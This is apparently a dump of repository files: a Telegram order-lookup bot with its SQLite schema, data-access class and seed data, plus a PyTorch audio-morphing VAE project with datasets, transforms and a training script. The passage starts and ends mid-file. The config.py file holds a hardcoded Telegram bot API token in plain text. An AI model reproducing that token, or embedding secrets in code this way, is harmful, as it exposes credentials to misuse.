info)\n\n\ndef order_summary_info():\n @bot.message_handler(content_types=['text'])\n def order_summary(message):\n db = SQLiter(config.database_name)\n order = db.get_order_summary(message.text)\n print(order)\n if len(order) == 0:\n bot.send_message(message.chat.id, 'Нет заказа с таким ID.')\n else:\n for c in order:\n info = 'ID заказа: ' + str(c[0]) + '\\nСумма заказа: ' + str(c[1]) + ' руб. \\nСкидка: '\\\n + str(c[2]) + '% \\nИмя клиента: ' + str(c[4]) + '\\nНомер теленфона: ' + str(c[5])\n bot.send_message(message.chat.id, info)\n\nbot.polling()\n" }, { "alpha_fraction": 0.6681849956512451, "alphanum_fraction": 0.684653103351593, "avg_line_length": 23.18644142150879, "blob_id": "d394f5b6643691af56829b324562fb91ba7fb6da", "content_id": "7043a4ce0414604167ac71d0a20f0b733a8983cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 2854, "license_type": "no_license", "max_line_length": 82, "num_lines": 118, "path": "/database.ddl", "repo_name": "mykaminskaya/DBMS-project", "src_encoding": "UTF-8", "text": "CREATE TABLE courier (\n id_courier INT PRIMARY KEY,\n courier_name VARCHAR(40),\n phone_number VARCHAR(20),\n transport VARCHAR(20)\n);\n\n\nCREATE TABLE pick_up_point (\n id_pick_up_point INT PRIMARY KEY,\n address VARCHAR(150),\n payment_types VARCHAR(50),\n storage_duration INT,\n working_time VARCHAR(20)\n);\n\n\nCREATE TABLE client (\n id_client INT PRIMARY KEY,\n client_name VARCHAR(40),\n gender VARCHAR(10),\n phone_number VARCHAR(20),\n clothes_size INT\n);\n\n\nCREATE TABLE orders (\n id_order INT PRIMARY KEY,\n sum FLOAT,\n discount INT,\n id_client INT,\n FOREIGN KEY (id_client) REFERENCES client(id_client)\n);\n\n\nCREATE TABLE shipper (\n id_shipper INT PRIMARY KEY,\n company_name VARCHAR(40)\n);\n\n\nCREATE TABLE storage (\n id_comment INT PRIMARY KEY,\n address VARCHAR(150),\n working_time VARCHAR(20),\n capacity INT\n);\n\n\nCREATE TABLE product (\n id_product INT PRIMARY KEY,\n brand VARCHAR(20),\n season VARCHAR(20),\n size INT,\n gender VARCHAR(10),\n product_type VARCHAR(20),\n color VARCHAR(20),\n material VARCHAR(20),\n price FLOAT,\n origin_country VARCHAR(20),\n id_shipper INT,\n FOREIGN KEY (id_shipper) REFERENCES shipper(id_shipper)\n);\n\n\nCREATE TABLE parcel (\n id_parcel INT PRIMARY KEY,\n payment_type VARCHAR(20),\n delivery_type VARCHAR(20),\n delivery_time_start DATETIME,\n delivery_time_end DATETIME,\n address VARCHAR(150),\n id_courier INT,\n id_storage INT,\n id_order INT,\n FOREIGN KEY (id_courier) REFERENCES courier(id_courier),\n FOREIGN KEY (id_storage) REFERENCES storage(id_storage),\n FOREIGN KEY (id_order) REFERENCES orders(id_order)\n);\n\n\n\nCREATE TABLE client_pick_up_point (\n id_client INT,\n id_pick_up_point INT,\n FOREIGN KEY (id_client) REFERENCES client(id_client),\n FOREIGN KEY (id_pick_up_point) REFERENCES pick_up_point(id_pick_up_point),\n CONSTRAINT PK_client_pick_up_point PRIMARY KEY (id_client, id_pick_up_point)\n);\n\n\nCREATE TABLE courier_pick_up_point (\n id_courier INT,\n id_pick_up_point INT,\n FOREIGN KEY (id_courier) REFERENCES courier(id_courier),\n FOREIGN KEY (id_pick_up_point) REFERENCES pick_up_point(id_pick_up_point),\n CONSTRAINT PK_courier_pick_up_point PRIMARY KEY (id_courier, id_pick_up_point)\n);\n\n\nCREATE TABLE product_order (\n id_product INT,\n id_order INT,\n quantity INT,\n FOREIGN KEY (id_product) REFERENCES product(id_product),\n FOREIGN KEY (id_order) REFERENCES orders(id_order),\n CONSTRAINT PK_product_order PRIMARY KEY (id_product, id_order)\n);\n\n\nCREATE TABLE product_storage (\n id_product INT,\n id_storage INT,\n quantity INT,\n FOREIGN KEY (id_product) REFERENCES product(id_product),\n FOREIGN KEY (id_storage) REFERENCES storage(id_storage),\n CONSTRAINT PK_product_storage PRIMARY KEY (id_product, id_storage)\n);\n" }, { "alpha_fraction": 0.6382978558540344, "alphanum_fraction": 0.6382978558540344, "avg_line_length": 22.5, "blob_id": "bf69d352a86351c2e1e3db251f8851f940267fc4", "content_id": "3ce558cc2eec465e9134ee26f490874228b6433f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47, "license_type": "no_license", "max_line_length": 26, "num_lines": 2, "path": "/config.py", "repo_name": "mykaminskaya/DBMS-project", "src_encoding": "UTF-8", "text": "API_TOKEN = '1454096853:AAGw-RoippRv7M1kEeWzRkmlASsUm0eToOE'\ndatabase_name = 'shops.db'\n" }, { "alpha_fraction": 0.4716067910194397, "alphanum_fraction": 0.4773785173892975, "avg_line_length": 37.9202880859375, "blob_id": "839a0d26acd0c451784a50c249a99460c5602843", "content_id": "f3df6e29ef01326c9da1edb93de598b2c82dd634", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5382, "license_type": "no_license", "max_line_length": 151, "num_lines": 138, "path": "/data_handler.py", "repo_name": "mykaminskaya/DBMS-project", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport sqlite3\n\nclass SQLiter:\n def __init__(self, database):\n self.connection = sqlite3.connect(database)\n self.cursor = self.connection.cursor()\n\n def get_order_summary(self, order_id):\n with self.connection:\n return self.cursor.execute('''\n SELECT orders.id_order, orders.sum, orders.discount, client.id_client, client.client_name, client.phone_number\n FROM orders\n JOIN client ON orders.id_client = client.id_client\n WHERE orders.id_order = ?\n ''', (order_id, )).fetchall()\n\n def get_client_purchases(self, client_id):\n with self.connection:\n return self.cursor.execute('''\n SELECT orders.id_order, product.id_product, product.product_type, product.price, product_order.quantity\n FROM orders\n JOIN product_order ON orders.id_order = product_order.id_order\n JOIN product ON product_order.id_product = product.id_product\n WHERE orders.id_client = ?\n ''', (client_id, )).fetchall()\n\n def get_courier_timetable(self, courier_id, delivery_time_start, delivery_time_end):\n with self.connection:\n return self.cursor.execute('''\n SELECT parcel.delivery_time_start, parcel.delivery_time_end, parcel.id_parcel, parcel.delivery_type, parcel.address, client.client_name\n FROM parcel\n JOIN orders ON parcel.id_order = orders.id_order\n JOIN client ON orders.id_client = client.id_client\n WHERE parcel.id_courier = ? AND parcel.delivery_time_end > ?\n AND parcel.delivery_time_start < ?\n ORDER BY parcel.delivery_time_start\n ''', (courier_id, delivery_time_start, delivery_time_end)).fetchall()\n\n # d = [product_id, brand, season, size, gender, product_type, color, material, price, origin_country, id_shipper]\n def add_product(self, d):\n with self.connection:\n flag = self.cursor.execute('''\n SELECT id_product\n FROM product\n WHERE id_product = ?\n ''', (d[0],)).fetchall()\n\n if len(flag) != 0:\n return 0\n\n with self.connection:\n self.cursor.execute(''' \n INSERT INTO product VALUES\n (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\n ''', (d[0], d[1], d[2], d[3], d[4], d[5], d[6], d[7], d[8], d[9], d[10], )).fetchall()\n return 1\n\n def get_product_info(self, product_id):\n with self.connection:\n return self.cursor.execute('''\n SELECT id_product, product_type\n FROM product\n WHERE product.id_product = ?\n ''', (product_id, )).fetchall()\n\n\n def change_address(self, order_id, address):\n with self.connection:\n flag = self.cursor.execute('''\n SELECT id_order\n FROM orders\n WHERE id_order = ?\n ''', (order_id,)).fetchall()\n\n if len(flag) == 0:\n return 0\n\n with self.connection:\n flag = self.cursor.execute('''\n SELECT id_pick_up_point\n FROM pick_up_point\n WHERE address = ?\n ''', (address,)).fetchall()\n flag1 = self.cursor.execute('''\n SELECT delivery_type\n FROM parcel\n WHERE id_order = ?\n ''', (order_id,)).fetchall()\n\n if (len(flag) == 0) and (flag1[0][0] == 'пункт выдачи'):\n return 1\n\n with self.connection:\n flag = self.cursor.execute('''\n UPDATE parcel SET address = ?\n WHERE id_order = ? \n ''', (address, order_id,)).fetchall()\n\n return 2\n\n def change_payment(self, order_id, payment):\n with self.connection:\n flag = self.cursor.execute('''\n SELECT id_order\n FROM orders\n WHERE id_order = ?\n ''', (order_id,)).fetchall()\n\n if len(flag) == 0:\n return 0\n\n with self.connection:\n self.cursor.execute('''\n UPDATE parcel SET payment_type = ?\n WHERE id_order = ? \n ''', (payment, order_id,)).fetchall()\n\n return 1\n\n def get_parcels(self, order_id):\n with self.connection:\n return self.cursor.execute('''\n SELECT id_order, id_parcel, payment_type\n FROM parcel\n WHERE id_order = ? \n ''', (order_id,)).fetchall()\n\n def get_address(self, order_id):\n with self.connection:\n return self.cursor.execute('''\n SELECT id_order, id_parcel, address\n FROM parcel\n WHERE id_order = ? \n ''', (order_id,)).fetchall()\n\n def close(self):\n self.connection.close()\n" }, { "alpha_fraction": 0.34722819924354553, "alphanum_fraction": 0.5771379470825195, "avg_line_length": 38.440677642822266, "blob_id": "9362e4c90a3477db6b93c4ba4532414a5315a5cf", "content_id": "704e0c6d96fa2ee63895fd8553c9b8577d0511c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 2859, "license_type": "no_license", "max_line_length": 112, "num_lines": 59, "path": "/create_db.sql", "repo_name": "mykaminskaya/DBMS-project", "src_encoding": "UTF-8", "text": "INSERT INTO 'client' VALUES\n(1, 'Марина', 'женский', '+79859111177', 42),\n(2, 'Арина', 'женский', '+79859111377', 44),\n(3, 'Сергей', 'мужской', '+79859111277', 150);\n\nINSERT INTO 'shipper' VALUES\n(1, 'STONKS'),\n(2, 'FLEX'),\n(3, 'CRINGE'),\n(4, 'CHILL'),\n(5, 'DOG');\n\nINSERT INTO 'product' VALUES\n(0, 'gucci', 'лето', 39, 'женский', 'flip-flops', 'серый', 'кожа', 25000, 'США', 1),\n(1, 'gucci', 'зима', 55, 'мужской', 'куртка', 'красный', 'хлопок', 125000, 'США', 1),\n(2, 'prada', 'демисезон', 7, 'женский', 'перчатки', 'серый', 'кожа', 35000, 'Великобритания', 2),\n(3, 'abc', 'лето', 43, 'мужской', 'джинсы', 'синий', 'деним', 5000, 'Россия', 3),\n(4, 'abc', 'зима', 45, 'женский', 'шарф', 'зеленый', 'шерсть', 3000, 'Россия', 3),\n(5, 'abcd', 'демисезон', 42, 'женский', 'топ', 'мультиколор', 'хлопок', 2300, 'Германия', 4);\n\nINSERT INTO 'orders' VALUES\n(1, 40000, 10, 1),\n(2, 3000, 15, 1),\n(3, 7500, 20, 2),\n(4, 12500, 20, 2),\n(5, 2500, 15, 2),\n(6, 8000, 5, 3),\n(7, 33000, 5, 3);\n\nINSERT INTO 'courier' VALUES\n(1, 'Pavel', '89091234327', 'велосипед');\n\nINSERT INTO 'pick_up_point' VALUES\n(1, 'Маковского 2', 'наличными', '3', '8:00 - 23:00'),\n(2, 'Ленина 12', 'наоичными или картой', '5', '7:00 - 23:00');\n\nINSERT INTO 'storage' VALUES\n(1, 'Пушкина 21', '6:00 - 23:30', 1000),\n(2, 'Колотушкина 12', '3:00 - 23:30', 2000);\n\nINSERT INTO 'parcel' VALUES\n(1, 'картой', 'пункт выдачи', '2020-12-15 7:00', '2020-12-16 7:00', 'Маковского 2', 1, 1, 1),\n(2, 'картой', 'пункт выдачи', '2020-12-15 7:00:00', '2020-12-16 7:00:00.000', 'Маковского 2', 1, 2, 1),\n(3, 'наличными', 'на дом', '2020-12-21 19:30:00.000', '2020-12-21 21:30:00.000', 'Старый Арбат 10', 1, 1, 2),\n(4, 'картой', 'пункт выдачи', '2020-12-20 7:00:00.000', '2020-12-22 7:00:00.000', 'Ленина 12', 1, 1, 3),\n(5, 'картой', 'пункт выдачи', '2020-12-25 7:00:00.000', '2020-12-27 7:00:00.000', 'Ленина 12', 1, 2, 4),\n(6, 'картой', 'на дом', '2020-12-26 15:00:00.000', '2020-12-26 17:30:00.000', 'Покровский бульвар 11', 1, 2, 5),\n(7, 'наличными', 'пункт выдачи', '2020-12-29 10:00:00.000', '2020-12-30 10:00:00.000', 'Маковского 2', 1, 2, 6),\n(8, 'картой', 'пункт выдачи', '2020-12-30 7:00:00.000', '2020-12-31 7:00:00.000', 'Маковского 2', 1, 1, 7);\n\nINSERT INTO 'product_order' VALUES\n(1, 1, 2),\n(5, 1, 4),\n(0, 2, 1),\n(3, 3, 3),\n(4, 4, 1),\n(2, 5, 1),\n(1, 6, 5),\n(2, 7, 10);\n" } ]
7
miccio-dk/sound_morph
https://github.com/miccio-dk/sound_morph
1ddd344180b98d1661b90cd4f7309067ea8d5231
0dfb3a0106a4f71f02613cf28fd75a16b4993e9b
521abc5fe8d8f7ad15a10556b2b2041817b9a41b
refs/heads/main
2023-05-27T12:44:10.659178
2021-06-18T12:38:02
2021-06-18T12:38:02
336,076,322
0
1
null
2021-02-04T20:38:02
2021-02-25T16:35:59
2021-02-26T10:00:36
Jupyter Notebook
[ { "alpha_fraction": 0.5393322110176086, "alphanum_fraction": 0.5495189428329468, "avg_line_length": 30.553571701049805, "blob_id": "d998901bca5388e56f7042c7f879a109cb855499", "content_id": "8b017d43c3aa338b16c0607d4b92dc825c380dc4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1767, "license_type": "no_license", "max_line_length": 118, "num_lines": 56, "path": "/datasets/transforms.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "import math\nimport torch\nfrom torchaudio.functional import amplitude_to_DB\n\n\nclass Stft(object):\n def __init__(self, n_fft, window=None, return_complex=False, **kwargs):\n self.n_fft = n_fft\n self.window = torch.Tensor(window) if window is not None else None\n self.return_complex = return_complex\n self.kwargs = kwargs\n\n def __call__(self, x):\n x_spec = torch.stft(x, self.n_fft, \n window=self.window.to(x.device), \n return_complex=self.return_complex, \n **self.kwargs)\n x_spec = x_spec.transpose(-1, -3)\n return x_spec\n \n\nclass Istft(object):\n def __init__(self, n_fft, window=None, return_complex=False, **kwargs):\n self.n_fft = n_fft\n self.window = torch.Tensor(window) if window is not None else None\n self.return_complex = return_complex\n self.kwargs = kwargs\n\n def __call__(self, x_spec):\n x_spec = x_spec.transpose(-3, -1)\n x = torch.istft(x_spec, self.n_fft, \n window=self.window.to(x_spec.device), \n return_complex=self.return_complex, \n **self.kwargs)\n return x\n\n \nclass ConvToMag(object):\n def __init__(self):\n pass\n\n def __call__(self, x_spec):\n x_spec = x_spec.transpose(-3, -1).contiguous()\n x_spec = torch.view_as_complex(x_spec)\n x_mag = torch.abs(x_spec)\n return x_mag\n\n \nclass ConvToDb(object):\n def __init__(self):\n pass\n\n def __call__(self, x_spec):\n x_mag = ConvToMag()(x_spec)\n x_db = amplitude_to_DB(x_mag, multiplier=20., amin=1e-5, db_multiplier=math.log10(max(1e-5, 1.)), top_db=120.)\n return x_db\n" }, { "alpha_fraction": 0.5874689817428589, "alphanum_fraction": 0.5887096524238586, "avg_line_length": 32.58333206176758, "blob_id": "3e5eeb7607f955757dbcbcce78da9fe5bb71cd05", "content_id": "e62717e2f114077cff2fd1cf007ce0dddeed9176", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1612, "license_type": "no_license", "max_line_length": 85, "num_lines": 48, "path": "/datasets/urbansounds_dataset.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "import os.path as osp\nimport pandas as pd\nimport librosa as lr\nimport torch\n\nfrom torch.utils.data import Dataset\n\n\n# generic sofa dataset\nclass UrbanSoundsDataset(Dataset):\n def __init__(self, dataset_path, transform=None, \n sr=None, duration=2, classes=None):\n self.dataset_path = dataset_path\n self.transform = transform\n self.sr = sr\n self.duration = duration\n self.classes = classes\n self.df = None\n self.load_data()\n\n def __len__(self):\n return self.df.shape[0]\n\n def __getitem__(self, idx: int):\n item = self.df.iloc[idx]\n filepath = osp.join(self.dataset_path, f'{item.name}.wav')\n sample, sr = lr.load(filepath, sr=self.sr, duration=self.duration, mono=True)\n sample = lr.util.fix_length(sample, int(sr * self.duration))\n sample = torch.tensor(sample)\n if self.transform:\n sample = self.transform(sample)\n return sample, item.to_dict()\n\n def load_data(self):\n filepath_cache = osp.join(self.dataset_path, 'train.pkl')\n if osp.exists(filepath_cache):\n #print(f'Loading cached data: {filepath_cache}')\n _df = pd.read_pickle(filepath_cache)\n else:\n filepath = osp.join(self.dataset_path, 'train.csv')\n #print(f'Caching data: {filepath}')\n _df = pd.read_csv(filepath, index_col='ID')\n _df.to_pickle(filepath_cache)\n # filter data\n if self.classes:\n _df = _df[_df['Class'].isin(self.classes)]\n self.df = _df\n #print(f'Data: {_df.shape}')\n" }, { "alpha_fraction": 0.5999091863632202, "alphanum_fraction": 0.6008174419403076, "avg_line_length": 36.3220329284668, "blob_id": "4d876fe411606085db2890611db0f58cfa5e52b8", "content_id": "2b00b7a9926b52da2560b9dac5ee0e66c7116dc5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2202, "license_type": "no_license", "max_line_length": 99, "num_lines": 59, "path": "/datasets/nsynth_dataset.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "import os.path as osp\nimport pandas as pd\nimport librosa as lr\nimport torch\n\nfrom torch.utils.data import Dataset\n\n\n# generic sofa dataset\nclass NsynthDataset(Dataset):\n def __init__(self, dataset_path, transform=None, \n sr=None, duration=2,\n pitches=None, velocities=None, instrument_sources=None, instrument_families=None):\n self.dataset_path = dataset_path\n self.transform = transform\n self.sr = sr\n self.duration = duration\n self.pitches = pitches\n self.velocities = velocities\n self.instrument_sources = instrument_sources\n self.instrument_families = instrument_families\n self.df = None\n self.load_data()\n\n def __len__(self):\n return self.df.shape[0]\n\n def __getitem__(self, idx: int):\n item = self.df.iloc[idx]\n filepath = osp.join(self.dataset_path, 'audio', f'{item.name}.wav')\n sample, sr = lr.load(filepath, sr=self.sr, duration=self.duration, mono=True)\n sample = lr.util.fix_length(sample, sr * self.duration)\n sample = torch.tensor(sample)\n if self.transform:\n sample = self.transform(sample)\n item = item.drop('qualities_str').to_dict()\n return sample, item\n\n def load_data(self):\n filepath_cache = osp.join(self.dataset_path, 'examples_cache.pkl')\n if osp.exists(filepath_cache):\n #print(f'Loading cached data: {filepath_cache}')\n _df = pd.read_pickle(filepath_cache)\n else:\n filepath = osp.join(self.dataset_path, 'examples.json')\n #print(f'Caching data: {filepath}')\n _df = pd.read_json(filepath).T\n _df.to_pickle(filepath_cache)\n # filter data\n if self.pitches:\n _df = _df[_df['pitch'].isin(self.pitches)]\n if self.velocities:\n _df = _df[_df['velocity'].isin(self.velocities)]\n if self.instrument_sources:\n _df = _df[_df['instrument_source'].isin(self.instrument_sources)]\n if self.instrument_families:\n _df = _df[_df['instrument_family'].isin(self.instrument_families)]\n self.df = _df\n #print(f'Data: {_df.shape}')\n" }, { "alpha_fraction": 0.6487455368041992, "alphanum_fraction": 0.6684587597846985, "avg_line_length": 28.421052932739258, "blob_id": "4d9535141433e40b909f4f1883a287c3446ee5e1", "content_id": "644004608d35eb46a6baeed1f173b650051f3c13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 558, "license_type": "no_license", "max_line_length": 116, "num_lines": 19, "path": "/models/utils.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "import math\nimport torch\nfrom torch.optim import Adam\nfrom torch_optimizer import Yogi\nfrom torchaudio.functional import amplitude_to_DB\n\n\ndef pick_optimizer(optim_name):\n return {\n 'adam': Adam,\n 'yogi': Yogi\n }.get(optim_name, Adam)\n\ndef spec_to_db(x_spec, top_db=80, amin=1e-5):\n x_spec = x_spec.transpose(-3, -1).contiguous()\n x_spec = torch.view_as_complex(x_spec)\n x_mag = torch.abs(x_spec)\n x_db = amplitude_to_DB(x_mag, multiplier=20., amin=amin, db_multiplier=math.log10(max(amin, 1.)), top_db=top_db)\n return x_db" }, { "alpha_fraction": 0.5994962453842163, "alphanum_fraction": 0.6007556915283203, "avg_line_length": 33.434783935546875, "blob_id": "ecac8163766369b03a9166237d81671f5e88438d", "content_id": "7518e0998df3e9289c90971266d2ad9447088e1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1588, "license_type": "no_license", "max_line_length": 111, "num_lines": 46, "path": "/models/vae_base.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "import torch\nfrom pytorch_lightning import LightningModule\n\nfrom .utils import pick_optimizer\n\nclass VaeBase(LightningModule):\n def __init__(self, configs):\n super().__init__()\n self.configs = configs\n self.save_hyperparameters()\n\n def training_step(self, batch, batch_idx):\n losses = self._step(batch, batch_idx)\n for loss_name, loss in losses.items():\n self.log(f'train_{loss_name}', loss)\n return losses['loss']\n\n def validation_step(self, batch, batch_idx):\n losses = self._step(batch, batch_idx)\n for loss_name, loss in losses.items():\n self.log(f'val_{loss_name}', loss)\n\n def test_step(self, batch, batch_idx):\n self._step(batch, batch_idx)\n \n def _step(self, batch, batch_idx):\n x_true, labels = batch\n # run entire model\n x_rec, mean, log_var, z = self._shared_eval(x_true)\n # calculate loss\n losses = self._loss_function(x_true, x_rec, mean, log_var, z)\n return losses\n \n def _reparameterize(self, mean, log_var):\n std = torch.exp(0.5 * log_var)\n eps = torch.randn_like(std)\n return mean + eps * std\n\n def configure_optimizers(self):\n OptimClass = pick_optimizer(self.configs['optim'])\n optimizer = OptimClass(self.parameters(), **self.configs['optim_kwargs'])\n lr_scheduler = {\n 'scheduler': torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, **self.configs['lr_scheduler']),\n 'monitor': 'val_loss'\n }\n return [optimizer], [lr_scheduler]\n " }, { "alpha_fraction": 0.6562067270278931, "alphanum_fraction": 0.6598984599113464, "avg_line_length": 47.155555725097656, "blob_id": "6e726fd889ff78d4324ada332543bc23dd71153a", "content_id": "f65e398b51a3818b761d4f436e775a5a05b43225", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2167, "license_type": "no_license", "max_line_length": 130, "num_lines": 45, "path": "/datasets/nsynth_datamodule.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "import os.path as osp\n\nfrom torch.utils.data import DataLoader\nfrom pytorch_lightning import LightningDataModule\nfrom torchvision.transforms import Compose\nfrom .nsynth_dataset import NsynthDataset\nfrom .transforms import Stft\n\n\nclass NsynthDataModule(LightningDataModule):\n def __init__(self, configs, num_workers=4, batch_size=32):\n super().__init__()\n # store params\n self.configs = configs\n self.num_workers = num_workers\n self.batch_size = batch_size\n # setup transforms\n if self.configs['feature'] == 'spec':\n #print(self.configs['feature_params'])\n self.transform = Stft(n_fft=self.configs['n_fft'], **self.configs['feature_params'])\n ## TODO implement more features?\n\n def setup(self, stage=None):\n # train/val\n if stage == 'fit' or stage is None:\n dataset_path_train = osp.join(self.configs['dataset_path'], 'nsynth-train')\n self.data_train = NsynthDataset(dataset_path_train, transform=self.transform, **self.configs['ds_kwargs'])\n dataset_path_val = osp.join(self.configs['dataset_path'], 'nsynth-valid')\n self.data_val = NsynthDataset(dataset_path_val, transform=self.transform, **self.configs['ds_kwargs'])\n self.dims = self.data_train[0][0].shape\n # test\n if stage == 'test' or stage is None:\n dataset_path_test = osp.join(self.configs['dataset_path'], 'nsynth-test')\n self.data_test = NsynthDataset(dataset_path_test, transform=self.transform, **self.configs['ds_kwargs'])\n if len(self.data_test) > 0:\n self.dims = getattr(self, 'dims', self.data_test[0][0].shape)\n\n def train_dataloader(self):\n return DataLoader(self.data_train, batch_size=self.batch_size, shuffle=True, drop_last=True, num_workers=self.num_workers)\n\n def val_dataloader(self):\n return DataLoader(self.data_val, batch_size=self.batch_size, shuffle=False, drop_last=True, num_workers=self.num_workers)\n\n def test_dataloader(self):\n return DataLoader(self.data_test, batch_size=self.batch_size, shuffle=False, num_workers=self.num_workers)\n" }, { "alpha_fraction": 0.6433486342430115, "alphanum_fraction": 0.6473624110221863, "avg_line_length": 39.55813980102539, "blob_id": "336c9c91d904aaf70c6e689daa34753606a57265", "content_id": "6b901634c194a9cfa82dabc7579b1aa1d71ecdd2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1744, "license_type": "no_license", "max_line_length": 131, "num_lines": 43, "path": "/datasets/urbansounds_datamodule.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "import os.path as osp\n\nfrom torch.utils.data import DataLoader, random_split\nfrom pytorch_lightning import LightningDataModule\nfrom torchvision.transforms import Compose\nfrom .urbansounds_dataset import UrbanSoundsDataset\nfrom .transforms import Stft\n\n\nclass UrbanSoundsModule(LightningDataModule):\n def __init__(self, configs, num_workers=4, batch_size=32):\n super().__init__()\n # store params\n self.configs = configs\n self.num_workers = num_workers\n self.batch_size = batch_size\n # setup transforms\n if self.configs['feature'] == 'spec':\n #print(self.configs['feature_params'])\n self.transform = Stft(n_fft=self.configs['n_fft'], **self.configs['feature_params'])\n ## TODO implement more features?\n\n def setup(self, stage=None):\n # train/val\n if stage == 'fit' or stage is None:\n self.data_all = UrbanSoundsDataset(self.configs['dataset_path'], transform=self.transform, **self.configs['ds_kwargs'])\n # split data\n train_len = int(len(self.data_all) * 0.8)\n val_len = len(self.data_all) - train_len\n self.data_train, self.data_val = random_split(self.data_all, [train_len, val_len])\n self.dims = self.data_train[0][0].shape\n # test\n if stage == 'test' or stage is None:\n pass\n\n def train_dataloader(self):\n return DataLoader(self.data_train, batch_size=self.batch_size, shuffle=True, drop_last=True, num_workers=self.num_workers)\n\n def val_dataloader(self):\n return DataLoader(self.data_val, batch_size=self.batch_size, shuffle=False, drop_last=True, num_workers=self.num_workers)\n\n def test_dataloader(self):\n return None\n" }, { "alpha_fraction": 0.7636363506317139, "alphanum_fraction": 0.7696969509124756, "avg_line_length": 21.5, "blob_id": "a5f2ca5a059263db3018faebcdf0656683cf4ed7", "content_id": "c192be89f1e0504866505aa6b3d68fb2417d1b8d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 495, "license_type": "no_license", "max_line_length": 89, "num_lines": 22, "path": "/README.md", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "# Sond morphing with deep learning\n\n## About\n...\n\n## Getting Started\nClone repository, create a conda environment, and install dependencies:\n```sh\ngit clone [email protected]:miccio-dk/sound_morph.git\ncd ./sound_morph\nconda create --name sound_morph\nconda activate sound_morph\nconda install pytorch torchvision torchaudio cudatoolkit=10.2 -c pytorch\nconda install scipy pandas scikit-learn librosa tqdm matplotlib seaborn pytorch_lightning\nconda install pip nodejs jupyterlab\n...\n```\n\n## Usage\n```sh\n\n```\n" }, { "alpha_fraction": 0.6686119437217712, "alphanum_fraction": 0.6694455742835999, "avg_line_length": 28.2560977935791, "blob_id": "7aff5229bdf3e940d7c7c3390639e365136e2cbf", "content_id": "5b1acea36f87ca7dcb172b6e4493db5d1cbd797b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2399, "license_type": "no_license", "max_line_length": 98, "num_lines": 82, "path": "/train.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "import warnings\nwarnings.simplefilter(\"ignore\", UserWarning)\n\nimport os\nimport json\nimport numpy as np\nimport librosa as lr\nimport torch\nimport pytorch_lightning as pl\n\nfrom argparse import ArgumentParser\nfrom pprint import pprint\nfrom scipy.signal.windows import hann\nfrom pytorch_lightning.loggers import TensorBoardLogger\nfrom pytorch_lightning.callbacks import LearningRateMonitor, EarlyStopping\n\nfrom datasets.nsynth_datamodule import NsynthDataModule\nfrom models.cvae_resnet import CvaeResnet\nfrom models.cvae_inception import CvaeInception\nfrom models.vae_inception import VaeInception\nfrom models.vae_inception_custom import VaeInceptionCustom\n\n\ndef main(args):\n pl.seed_everything(42)\n \n # load configs\n with open(args.cfg_path, 'r') as fp:\n cfg = json.load(fp)\n cfg_train = cfg['train']\n print('### TRAIN CONFIGS:')\n pprint(cfg_train)\n print('### MODEL CONFIGS:')\n pprint(cfg['model'])\n #os.environ['CUDA_VISIBLE_DEVICES'] = cfg_train['trainer_kwargs']['gpus']\n \n # load or init model\n ModelClass = {\n 'cvae': CvaeInception,\n 'vae': VaeInception,\n 'vae_cstm': VaeInceptionCustom\n }[cfg_train['type']]\n if args.ckpt_path:\n print(\"Loading pretrained model..\")\n model = ModelClass.load_from_checkpoint(checkpoint_path=args.ckpt_path, map_location=None)\n else:\n print(\"Initing new model..\")\n model = ModelClass(cfg['model'])\n \n # init data loader\n dm = NsynthDataModule(\n cfg['dataset'], \n num_workers=cfg_train['num_workers'], \n batch_size=cfg_train['batch_size'])\n dm.setup()\n \n # logger\n log_name = '{}_{}'.format(ModelClass.model_name, cfg_train['descr'])\n logger = TensorBoardLogger(save_dir='logs', name=log_name)\n \n # callbacks\n early_stop = EarlyStopping(monitor='val_loss', patience=cfg_train['patience'])\n lr_monitor = LearningRateMonitor(logging_interval='epoch')\n\n # trainer\n trainer = pl.Trainer(\n max_epochs=cfg_train['max_epochs'],\n logger=logger,\n callbacks=[early_stop, lr_monitor],\n **cfg_train['trainer_kwargs'])\n \n # train\n trainer.fit(model=model, datamodule=dm)\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('cfg_path', type=str)\n parser.add_argument('--ckpt_path', type=str)\n args = parser.parse_args()\n\n main(args)\n" }, { "alpha_fraction": 0.5554906725883484, "alphanum_fraction": 0.5775264501571655, "avg_line_length": 31.789474487304688, "blob_id": "c35fa5ea364108504c69fc571de6f20b43778778", "content_id": "d045ab52ea55422479cd1af96e868c3959b24601", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13705, "license_type": "no_license", "max_line_length": 119, "num_lines": 418, "path": "/models/cvae_resnet.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": 